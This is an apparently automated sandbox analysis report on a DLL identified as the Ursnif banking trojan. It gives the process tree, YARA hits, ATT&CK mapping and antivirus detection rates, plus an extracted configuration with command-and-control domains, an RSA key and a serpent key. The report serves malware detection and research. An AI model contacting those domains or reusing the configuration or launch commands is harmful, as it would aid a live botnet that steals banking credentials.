Play interactive tour

Edit tour

Windows Analysis Report c3.dll

Overview

General Information

Sample Name:	c3.dll
Analysis ID:	498859
MD5:	c309ec3264c7bf7c771cca5703e841fe
SHA1:	2af04c50d324bc6f42fe9714ea89cf300471c169
SHA256:	616255c7f0697542e2a3e5e6b4834fffa5e56e7ede26612454674a9937d32a19
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Uses 32bit PE files

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Program does not show much activity (idle)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6364 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c3.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6396 cmdline: rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6384 cmdline: rundll32.exe C:\Users\user\Desktop\c3.dll,@Againkind@0 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6436 cmdline: rundll32.exe C:\Users\user\Desktop\c3.dll,@Consonanttime@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6456 cmdline: rundll32.exe C:\Users\user\Desktop\c3.dll,@Nooncry@4 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "iZ+yu73sQgHWIoKVZvTBVFftBRzgg84Wo8cRK1WKzlYIyRSwRES+5puIFDGj4t/PJdO/J+rFd8Puk9xQXkAk5gtRJ+EiBjQZEhIJII9S4j9MojvldfnQXG4MCZq2vijykYOVQ/oipgSqNw946zszs4wFVrWAoZclk2bk1tyqtgqxkkj0TTwIXY2VfInsWFxD/3rDCluhcm6BGxwpQenf9WcO9HcjXScxWCVoj1xEKoz2EWs5Yz+47bMOX0XSfQdNTrhQDAWX7nAEEA6/oHUm46QdJTg5UtCf5yxbjwIgAf3SZboeJUyNSK7Q1WQQUlETGFBqUZa4n/YRWCQVzi42QoGrPxpP3LrDhlEYnFm7fQM=", "c2_domain": ["app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "3500", "server": "580", "serpent_key": "GfG96RIHgUj8PvPF", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.rundll32.exe.6f250000.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.31194a0.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
4.3.rundll32.exe.4238d07.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.3.rundll32.exe.2968d07.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.3.rundll32.exe.2dc8d07.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.6f250000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
3.3.rundll32.exe.2c08d07.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.3.loaddll32.exe.1088d07.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
0.2.loaddll32.exe.31194a0.0.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: c3.dll

Avira: detected

Found malware configuration

Show sources

Source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "iZ+yu73sQgHWIoKVZvTBVFftBRzgg84Wo8cRK1WKzlYIyRSwRES+5puIFDGj4t/PJdO/J+rFd8Puk9xQXkAk5gtRJ+EiBjQZEhIJII9S4j9MojvldfnQXG4MCZq2vijykYOVQ/oipgSqNw946zszs4wFVrWAoZclk2bk1tyqtgqxkkj0TTwIXY2VfInsWFxD/3rDCluhcm6BGxwpQenf9WcO9HcjXScxWCVoj1xEKoz2EWs5Yz+47bMOX0XSfQdNTrhQDAWX7nAEEA6/oHUm46QdJTg5UtCf5yxbjwIgAf3SZboeJUyNSK7Q1WQQUlETGFBqUZa4n/YRWCQVzi42QoGrPxpP3LrDhlEYnFm7fQM=", "c2_domain": ["app10.laptok.at", "apt.feel500.at", "init.in100k.at"], "botnet": "3500", "server": "580", "serpent_key": "GfG96RIHgUj8PvPF", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for submitted file

Show sources

Source: c3.dll	Virustotal: Detection: 58%			Perma Link
Source: c3.dll	ReversingLabs: Detection: 65%

Source: c3.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: c3.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\surface\829\began-Glad\Law.pdb source: loaddll32.exe, 00000000.00000002.878842314.000000006F26E000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.880085108.000000006F26E000.00000002.00020000.sdmp, c3.dll

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6f250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4238d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2968d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2dc8d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6f250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2c08d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.1088d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6f250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4238d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2968d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2dc8d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6f250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2c08d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.1088d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp, type: MEMORY

Source: c3.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F252264		0_2_6F252264
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F252264		3_2_6F252264

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F252485 NtQueryVirtualMemory,		0_2_6F252485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F252485 NtQueryVirtualMemory,		3_2_6F252485

Source: c3.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: c3.dll	Virustotal: Detection: 58%
Source: c3.dll	ReversingLabs: Detection: 65%

Source: c3.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Againkind@0

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c3.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Againkind@0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Consonanttime@8
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Nooncry@4
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Againkind@0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Consonanttime@8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c3.dll,@Nooncry@4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1	Jump to behavior

Source: classification engine

Classification label: mal72.troj.winDLL@11/0@0/0

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: c3.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: c3.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: c3.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: c3.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: c3.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: c3.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: c3.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: c3.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: c3.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: c3.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: c3.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: c3.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: c3.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F252200 push ecx; ret	0_2_6F252209
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F252253 push ecx; ret	0_2_6F252263
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F2635F6 push ebx; retf	0_2_6F263609
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F2639C2 push edi; retf	0_2_6F2639D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F26482E push ebp; retf	0_2_6F264842
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F26046F push edx; retf	0_2_6F260470
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F262885 push ss; retf 001Eh	0_2_6F26297E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F261C9C push ebp; iretd	0_2_6F261D20
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F260CF4 pushfd ; retf 005Dh	0_2_6F260D0A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F28092C push ebp; retf	0_2_6F28092D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F28013B push EC30617Dh; retn 0000h	0_2_6F28014E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F252200 push ecx; ret	3_2_6F252209
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F252253 push ecx; ret	3_2_6F252263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F2635F6 push ebx; retf	3_2_6F263609
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F2639C2 push edi; retf	3_2_6F2639D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F26482E push ebp; retf	3_2_6F264842
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F26046F push edx; retf	3_2_6F260470
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F262885 push ss; retf 001Eh	3_2_6F26297E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F261C9C push ebp; iretd	3_2_6F261D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F260CF4 pushfd ; retf 005Dh	3_2_6F260D0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F28092C push ebp; retf	3_2_6F28092D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F28013B push EC30617Dh; retn 0000h	3_2_6F28014E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F251F31 LoadLibraryA,GetProcAddress,

0_2_6F251F31

Source: initial sample

Static PE information: section name: .text entropy: 6.80010328322

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6f250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4238d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2968d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2dc8d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6f250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2c08d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.1088d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F27E20C mov eax, dword ptr fs:[00000030h]	0_2_6F27E20C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F27E142 mov eax, dword ptr fs:[00000030h]	0_2_6F27E142
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6F27DD49 push dword ptr fs:[00000030h]	0_2_6F27DD49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F27E20C mov eax, dword ptr fs:[00000030h]	3_2_6F27E20C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F27E142 mov eax, dword ptr fs:[00000030h]	3_2_6F27E142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F27DD49 push dword ptr fs:[00000030h]	3_2_6F27DD49

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F251F31 LoadLibraryA,GetProcAddress,

0_2_6F251F31

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c3.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.878132985.00000000016E0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.879301407.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.878132985.00000000016E0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.879301407.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.878132985.00000000016E0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.879301407.0000000003140000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000002.878132985.00000000016E0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.879301407.0000000003140000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		0_2_6F251566
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,		3_2_6F251566

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F25146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6F25146C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F2517A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

0_2_6F2517A7

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6f250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4238d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2968d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2dc8d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6f250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2c08d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.1088d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 3.2.rundll32.exe.6f250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4238d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.2968d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2dc8d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6f250000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.2c08d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.1088d07.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.31194a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.527385053.0000000002960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.556982674.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.545943062.0000000004230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.528290372.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.878420774.0000000003119000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.560938842.0000000001080000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection12	Rundll321	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Software Packing2	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	System Information Discovery13	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
c3.dll	59%	Virustotal		Browse
c3.dll	11%	Metadefender		Browse
c3.dll	66%	ReversingLabs	Win32.Trojan.Wacatac
c3.dll	100%	Avira	TR/AD.UrsnifDropper.mlwbg

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498859
Start date:	07.10.2021
Start time:	15:53:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	c3.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.winDLL@11/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 17.2% (good quality ratio 16.2%) Quality average: 79.2% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 53% Number of executed functions: 16 Number of non-executed functions: 13
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 95.100.218.79, 13.107.42.16, 13.107.5.88, 2.20.178.10, 2.20.178.56, 95.100.216.89, 20.50.102.62, 2.20.178.33, 2.20.178.24, 20.54.110.249, 40.112.88.60, 20.82.210.154, 104.127.115.201 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, 